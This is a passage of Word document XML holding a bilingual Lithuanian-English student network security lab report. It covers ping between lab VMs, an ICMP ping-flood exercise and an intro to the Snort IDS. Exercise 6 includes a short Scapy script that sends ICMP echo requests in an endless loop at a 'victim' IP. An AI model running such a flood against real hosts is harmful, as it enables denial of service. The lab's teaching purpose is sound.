                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="627380"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6980645B" w14:textId="77777777" w:rsidR="00864647" w:rsidRPr="00352171" w:rsidRDefault="00864647" w:rsidP="00864647"/>
    <w:p w14:paraId="2239E6CB" w14:textId="77777777" w:rsidR="00864647" w:rsidRPr="00352171" w:rsidRDefault="00864647" w:rsidP="00864647"/>
    <w:p w14:paraId="19272F2D" w14:textId="77777777" w:rsidR="00864647" w:rsidRPr="00352171" w:rsidRDefault="00864647" w:rsidP="00864647"/>
    <w:p w14:paraId="11822F73" w14:textId="1E7F2283" w:rsidR="00864647" w:rsidRPr="00352171" w:rsidRDefault="00864647" w:rsidP="00864647">
      <w:r w:rsidRPr="00352171">
        <w:t>LT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E727D9" w14:textId="10382B71" w:rsidR="00864647" w:rsidRPr="00352171" w:rsidRDefault="00864647" w:rsidP="00864647">
      <w:r w:rsidRPr="00352171">
        <w:t>ICMP protokolas yra skirtas įrenginiam perduoti vienas kitam pranešimą, kuris susijęs su tinklo klaida arba jei routeris rado trumpesnį kelią. PVZ: „ping“ komanda skirta nustatyti ar įrenginys yra pasiekiamas tinkle, bei kokiu greičiu nukeliavo paketai ir ar buvo praradimų. Kaip matote iš Kali sistemos daviau komandą „ping 10.0.2.4“ su kuria patikrinau, ar Ubuntu sistema yra pasiekiama tinkle. Tiek Kali terminalas davė ženklą, jog ji pasiekiama, tiek Wireshark programa pavaizdavo siunčiamus prašymus bei atsakymus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06957567" w14:textId="59A1CDDF" w:rsidR="00864647" w:rsidRPr="00352171" w:rsidRDefault="00864647" w:rsidP="00864647">
      <w:r w:rsidRPr="00352171">
        <w:t>EN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EF06DC" w14:textId="77777777" w:rsidR="00864647" w:rsidRPr="00352171" w:rsidRDefault="00864647" w:rsidP="00864647">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>ICMP protocol is used for devices to send each other messages related to network errors or when a router has found a shorter path. For example, the ping command is used to determine whether a device is reachable on the network, how fast packets traveled, and whether there were any losses. As you can see, from the Kali system I ran the command ping 10.0.2.4 to check whether the Ubuntu system is reachable on the network. The Kali terminal indicated it was reachable, and Wireshark also showed the requests and replies being sent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040F96C6" w14:textId="11D4424C" w:rsidR="00864647" w:rsidRPr="00352171" w:rsidRDefault="00864647" w:rsidP="00864647"/>
    <w:p w14:paraId="01D635A2" w14:textId="71AB27C3" w:rsidR="00864647" w:rsidRPr="00352171" w:rsidRDefault="00864647" w:rsidP="00864647">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:lastRenderedPageBreak/>
        <w:t>Užduotis Nr. 6</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>(Exercise 6)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F308C89" w14:textId="32A26ADF" w:rsidR="00864647" w:rsidRPr="00352171" w:rsidRDefault="00864647" w:rsidP="00864647">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">ICMP </w:t>
      </w:r>
      <w:r w:rsidR="00FC3437" w:rsidRPr="00352171">
        <w:t>ping apkrovos ataka</w:t>
      </w:r>
      <w:r w:rsidR="00FC3437" w:rsidRPr="00352171">
        <w:br/>
        <w:t>(ICMP ping flooding)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F16E19F" w14:textId="77777777" w:rsidR="00FC3437" w:rsidRPr="00352171" w:rsidRDefault="00FC3437" w:rsidP="00FC3437"/>
    <w:p w14:paraId="15FB8BFA" w14:textId="39B5D0C5" w:rsidR="00FC3437" w:rsidRPr="00352171" w:rsidRDefault="00FC3437" w:rsidP="00FC3437">
      <w:r w:rsidRPr="00352171">
        <w:t>LT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152E7155" w14:textId="7342FD68" w:rsidR="00FC3437" w:rsidRPr="00352171" w:rsidRDefault="00FC3437" w:rsidP="00FC3437">
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">Kai yra panaudojama „ping“ komanda, įrenginys siunčia užklausą nurodytam IP adresui. Gavęs paketą, įrenginys  atsako grąžindamas atgal pranešimą. </w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>ICMP ping ataka yra skirta siųsti nenustojamą „ping“ paketų kiekį vienam įrenginiui su tikslu, kad bus išsiųstas labai didelis kiekis užklausų ir auka nespės į jas atsakinėti arba išnaudos labai daug savo resursų.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022F754D" w14:textId="49D03F77" w:rsidR="00FC3437" w:rsidRPr="00352171" w:rsidRDefault="00FC3437" w:rsidP="00FC3437">
      <w:r w:rsidRPr="00352171">
        <w:t>EN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3508C72C" w14:textId="7274F7C1" w:rsidR="00FC3437" w:rsidRPr="00352171" w:rsidRDefault="00FC3437" w:rsidP="00FC3437">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>When the ping command is used, a device sends a request (an ICMP Echo Request) to the specified IP address. When the target receives the packet, it replies by sending an ICMP Echo Reply back.</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>An ICMP ping attack is intended to send a continuous, large volume of ping packets to a single device with the goal of overwhelming it so the victim cannot respond to all requests or exhausts a large portion of its resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4198EB43" w14:textId="77777777" w:rsidR="00FC3437" w:rsidRPr="00352171" w:rsidRDefault="00FC3437" w:rsidP="00FC3437"/>
    <w:p w14:paraId="1361B22C" w14:textId="23879349" w:rsidR="00FC3437" w:rsidRPr="00352171" w:rsidRDefault="00FC3437" w:rsidP="00FC3437">
      <w:r w:rsidRPr="00352171">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="232A2B4B" wp14:editId="6013D8CE">
            <wp:extent cx="3638550" cy="714375"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="136875614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6149" name="Picture 1" descr="A black background with white text&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId40"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3638550" cy="714375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3695E0D0" w14:textId="357B7B9E" w:rsidR="00FC3437" w:rsidRPr="00352171" w:rsidRDefault="00FC3437" w:rsidP="00FC3437">
      <w:r w:rsidRPr="00352171">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D423350" wp14:editId="4CA50A08">
            <wp:extent cx="3219899" cy="638264"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="8179108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085" name="Picture 1" descr="A black background with white text&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId41"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3219899" cy="638264"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D4521D" w14:textId="46768503" w:rsidR="00FC3437" w:rsidRPr="00352171" w:rsidRDefault="00FC3437" w:rsidP="00FC3437">
      <w:r w:rsidRPr="00352171">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BD9A6FF" wp14:editId="30889653">
            <wp:extent cx="5438775" cy="1666875"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="72113033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0332" name="Picture 1" descr="A computer screen shot of a program&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId42"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5438775" cy="1666875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEC502F" w14:textId="77777777" w:rsidR="00FC3437" w:rsidRPr="00352171" w:rsidRDefault="00FC3437" w:rsidP="00FC3437"/>
    <w:p w14:paraId="053CD580" w14:textId="77777777" w:rsidR="00FC3437" w:rsidRPr="00352171" w:rsidRDefault="00FC3437" w:rsidP="00FC3437"/>
    <w:p w14:paraId="2070D6AB" w14:textId="77777777" w:rsidR="00FC3437" w:rsidRPr="00352171" w:rsidRDefault="00FC3437" w:rsidP="00FC3437"/>
    <w:p w14:paraId="1D41FADB" w14:textId="77777777" w:rsidR="00FC3437" w:rsidRPr="00352171" w:rsidRDefault="00FC3437" w:rsidP="00FC3437"/>
    <w:p w14:paraId="7C9533E3" w14:textId="77777777" w:rsidR="00FC3437" w:rsidRPr="00352171" w:rsidRDefault="00FC3437" w:rsidP="00FC3437">
      <w:r w:rsidRPr="00352171">
        <w:lastRenderedPageBreak/>
        <w:t>LT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706FC90B" w14:textId="16A750A9" w:rsidR="00FC3437" w:rsidRPr="00352171" w:rsidRDefault="00FC3437" w:rsidP="00FC3437">
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">Dokumentų aplankale sukuriame failą „touch ICMPflood.py“ ir tvarkome jį su komanda – „nano ICMPflood.py“. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B844009" w14:textId="27A60D1E" w:rsidR="00FC3437" w:rsidRPr="00352171" w:rsidRDefault="00FC3437" w:rsidP="00FC3437">
      <w:r w:rsidRPr="00352171">
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB3A047" w14:textId="4CD17B47" w:rsidR="00FC3437" w:rsidRPr="00352171" w:rsidRDefault="00FC3437" w:rsidP="00FC3437">
      <w:r w:rsidRPr="00352171">
        <w:t>from scapy.all import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAF60B0" w14:textId="534302DB" w:rsidR="00FC3437" w:rsidRPr="00352171" w:rsidRDefault="00FC3437" w:rsidP="00FC3437">
      <w:r w:rsidRPr="00352171">
        <w:t>icmp_request = IP(dst="10.0.2.4")/ICMP(type=8)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1D3B6C" w14:textId="77777777" w:rsidR="00FC3437" w:rsidRPr="00352171" w:rsidRDefault="00FC3437" w:rsidP="00FC3437">
      <w:r w:rsidRPr="00352171">
        <w:t>send(icmp_request, loop=1, verbose=False)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9AF753" w14:textId="4FB5B68A" w:rsidR="00FC3437" w:rsidRPr="00352171" w:rsidRDefault="00FC3437" w:rsidP="00FC3437">
      <w:r w:rsidRPr="00352171">
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3021B598" w14:textId="660E17FD" w:rsidR="00FC3437" w:rsidRPr="00352171" w:rsidRDefault="00FC3437" w:rsidP="00FC3437">
      <w:r w:rsidRPr="00352171">
        <w:tab/>
        <w:t>* dst = Aukos IP adresas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3815CC39" w14:textId="77777777" w:rsidR="00FC3437" w:rsidRPr="00352171" w:rsidRDefault="00FC3437" w:rsidP="00FC3437"/>
    <w:p w14:paraId="71C08051" w14:textId="6F9CDD89" w:rsidR="00FC3437" w:rsidRPr="00352171" w:rsidRDefault="00FC3437" w:rsidP="00FC3437">
      <w:r w:rsidRPr="00352171">
        <w:t>EN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFB8533" w14:textId="52E9A6B6" w:rsidR="00FC3437" w:rsidRPr="00352171" w:rsidRDefault="00FC3437" w:rsidP="00FC3437">
      <w:r w:rsidRPr="00352171">
        <w:t>In the Documents folder we create the file with touch ICMPflood.py and edit it with nano ICMPflood.py.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9E0BFA" w14:textId="77777777" w:rsidR="00FC3437" w:rsidRPr="00352171" w:rsidRDefault="00FC3437" w:rsidP="00FC3437">
      <w:r w:rsidRPr="00352171">
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093E4672" w14:textId="77777777" w:rsidR="00FC3437" w:rsidRPr="00352171" w:rsidRDefault="00FC3437" w:rsidP="00FC3437">
      <w:r w:rsidRPr="00352171">
        <w:t>from scapy.all import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352147F9" w14:textId="77777777" w:rsidR="00FC3437" w:rsidRPr="00352171" w:rsidRDefault="00FC3437" w:rsidP="00FC3437">
      <w:r w:rsidRPr="00352171">
        <w:t>icmp_request = IP(dst="10.0.2.4")/ICMP(type=8)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D2FD03" w14:textId="77777777" w:rsidR="00FC3437" w:rsidRPr="00352171" w:rsidRDefault="00FC3437" w:rsidP="00FC3437">
      <w:r w:rsidRPr="00352171">
        <w:t>send(icmp_request, loop=1, verbose=False)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314148F6" w14:textId="77777777" w:rsidR="00FC3437" w:rsidRPr="00352171" w:rsidRDefault="00FC3437" w:rsidP="00FC3437">
      <w:r w:rsidRPr="00352171">
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFAF12E" w14:textId="3106C4D5" w:rsidR="00FC3437" w:rsidRPr="00352171" w:rsidRDefault="00FC3437" w:rsidP="00FC3437">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:tab/>
        <w:t>* dst =Victims IP address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0D7B98" w14:textId="6449305B" w:rsidR="00633715" w:rsidRPr="00352171" w:rsidRDefault="00633715" w:rsidP="00FC3437">
      <w:r w:rsidRPr="00352171">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66D10E50" wp14:editId="7D1F0B8B">
            <wp:extent cx="3571875" cy="638175"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="142674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45432" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId43"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3571875" cy="638175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5709E2C2" w14:textId="1EE1DE0D" w:rsidR="00633715" w:rsidRPr="00352171" w:rsidRDefault="00633715" w:rsidP="00FC3437">
      <w:r w:rsidRPr="00352171">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A104B4C" wp14:editId="7111D6FD">
            <wp:extent cx="6711950" cy="571500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="434153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3570" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId44"/>
                    <a:srcRect b="68253"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6726399" cy="572730"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="119A323B" w14:textId="79245ED2" w:rsidR="00633715" w:rsidRPr="00352171" w:rsidRDefault="00633715" w:rsidP="00FC3437">
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">LT: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CAC3DDD" w14:textId="1E3DE893" w:rsidR="00633715" w:rsidRPr="00352171" w:rsidRDefault="00633715" w:rsidP="00FC3437">
      <w:r w:rsidRPr="00352171">
        <w:t>Paleidžiame skriptą naudodami „python ICMPflood.py“ ir atsidarę Wireshark programą matome, jog yra siunčiami dideli kiekiai ICMP užklausų per labai mažą laiko tarpą. (15 sekundžių - ~25 000 užklausų/atsakymų)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4567BA8C" w14:textId="076EB86F" w:rsidR="00FC3437" w:rsidRPr="00352171" w:rsidRDefault="00633715" w:rsidP="00FC3437">
      <w:r w:rsidRPr="00352171">
        <w:t>EN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28ED7D87" w14:textId="24606BF8" w:rsidR="00633715" w:rsidRPr="00352171" w:rsidRDefault="00633715" w:rsidP="00FC3437">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>We run the script using python ICMPflood.py and, with Wireshark open, we can see that large numbers of ICMP requests are being sent in a very short time period (15 seconds – ~25,000 requests/replies).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B307CA" w14:textId="77777777" w:rsidR="00633715" w:rsidRPr="00352171" w:rsidRDefault="00633715" w:rsidP="00FC3437"/>
    <w:p w14:paraId="260F0082" w14:textId="1D1711E5" w:rsidR="00633715" w:rsidRPr="00352171" w:rsidRDefault="002334F7" w:rsidP="002334F7">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:lastRenderedPageBreak/>
        <w:t>Užduotis Nr. 7</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>(Exercise 7)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EBD739" w14:textId="69F2838B" w:rsidR="002334F7" w:rsidRPr="00352171" w:rsidRDefault="002334F7" w:rsidP="002334F7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>Snort aptikimo/blokavimo sistema</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>(Snort detection/prevention system)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C486CD" w14:textId="77777777" w:rsidR="002334F7" w:rsidRPr="00352171" w:rsidRDefault="002334F7" w:rsidP="002334F7"/>
    <w:p w14:paraId="0A28916C" w14:textId="77777777" w:rsidR="00F479A4" w:rsidRPr="00352171" w:rsidRDefault="00F479A4" w:rsidP="002334F7">
      <w:pPr>
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t>Kadangi Snort nėra prieinamas Ubuntu 25.10 versijoje, tai man reikėjo pereiti prie Ubuntu 24.04.3 LTS versijos. Dėl to, mano sistemos IP ir MAC adresai pasikeitė.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A6CEF6" w14:textId="515F8C6A" w:rsidR="00F479A4" w:rsidRPr="00352171" w:rsidRDefault="00F479A4" w:rsidP="002334F7">
      <w:pPr>
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t>(Since Snort is not available on Ubuntu 25.10, I had to switch to Ubuntu 24.04.3 LTS. Because of this, my system’s IP and MAC addresses have changed.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368046F8" w14:textId="6E2592DB" w:rsidR="0088780D" w:rsidRPr="00352171" w:rsidRDefault="0088780D" w:rsidP="002334F7">
      <w:r w:rsidRPr="00352171">
        <w:t>LT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2215A94F" w14:textId="629424CB" w:rsidR="002334F7" w:rsidRPr="00352171" w:rsidRDefault="0088780D" w:rsidP="002334F7">
      <w:r w:rsidRPr="00352171">
        <w:t>Snort yra atvirojo kodo IDS/IPS sistema (Intrusion Detection / Intrusion Prevention System), kuri stebi tinklo srautą realiu laiku ir identifikuoja bei gali blokuoti įtartiną arba kenksmingą veiklą. IDS – aptinka atakas, įrašo jas į log‘us arba tiesiog išveda ekrane, bet jų nestabdo. IPS – aptinka atakas, pradeda jas blokuoti bei praneša aukai.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF161B5" w14:textId="77777777" w:rsidR="0088780D" w:rsidRPr="00352171" w:rsidRDefault="0088780D" w:rsidP="0088780D">
      <w:r w:rsidRPr="00352171">
        <w:t>EN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523263F3" w14:textId="79566362" w:rsidR="0088780D" w:rsidRPr="00352171" w:rsidRDefault="0088780D" w:rsidP="002334F7">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>Snort is an open-source IDS/IPS system (Intrusion Detection / Intrusion Prevention System) that monitors network traffic in real time and identifies and can block suspicious or malicious activity. IDS detects attacks, logs them or simply displays them on the screen, but does not stop them. IPS detects attacks, starts blocking them, and notifies the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68ADEF7B" w14:textId="780F3384" w:rsidR="0088780D" w:rsidRPr="00352171" w:rsidRDefault="0088780D" w:rsidP="002334F7">
      <w:r w:rsidRPr="00352171">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A383F58" wp14:editId="4277D3E5">
            <wp:extent cx="3419475" cy="514350"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="1638662960"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62960" name="Picture 1" descr="A close up of a computer screen&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId45"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3419475" cy="514350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCAA177" w14:textId="469A8CF9" w:rsidR="0088780D" w:rsidRPr="00352171" w:rsidRDefault="0088780D" w:rsidP="002334F7">
      <w:r w:rsidRPr="00352171">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="321F052C" wp14:editId="6B164538">
            <wp:extent cx="2981741" cy="342948"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16113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50616" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId46"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2981741" cy="342948"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B647348" w14:textId="7D3155F2" w:rsidR="00F479A4" w:rsidRPr="00352171" w:rsidRDefault="00F479A4" w:rsidP="002334F7">
      <w:r w:rsidRPr="00352171">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68BB1B73" wp14:editId="6D18F267">
            <wp:extent cx="3820058" cy="447737"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="39713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38001" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId47"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3820058" cy="447737"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C66238" w14:textId="6AECE16C" w:rsidR="004E64C0" w:rsidRPr="00352171" w:rsidRDefault="004E64C0" w:rsidP="002334F7">
      <w:r w:rsidRPr="00352171">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C90E52C" wp14:editId="11148129">
            <wp:extent cx="3648584" cy="743054"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2028782578" name="Picture 1" descr="A purpl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2578" name="Picture 1" descr="A purple rectangle with black text&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId48"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3648584" cy="743054"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B732B7E" w14:textId="66FDD17F" w:rsidR="004E64C0" w:rsidRPr="00352171" w:rsidRDefault="004E64C0" w:rsidP="002334F7">
      <w:r w:rsidRPr="00352171">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="325AD2A6" wp14:editId="6F545386">
            <wp:extent cx="6645910" cy="2087245"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="12198797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9701" name="Picture 1" descr="A computer screen shot of a program&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId49"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="2087245"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7642834C" w14:textId="77777777" w:rsidR="004E64C0" w:rsidRPr="00352171" w:rsidRDefault="004E64C0" w:rsidP="002334F7"/>
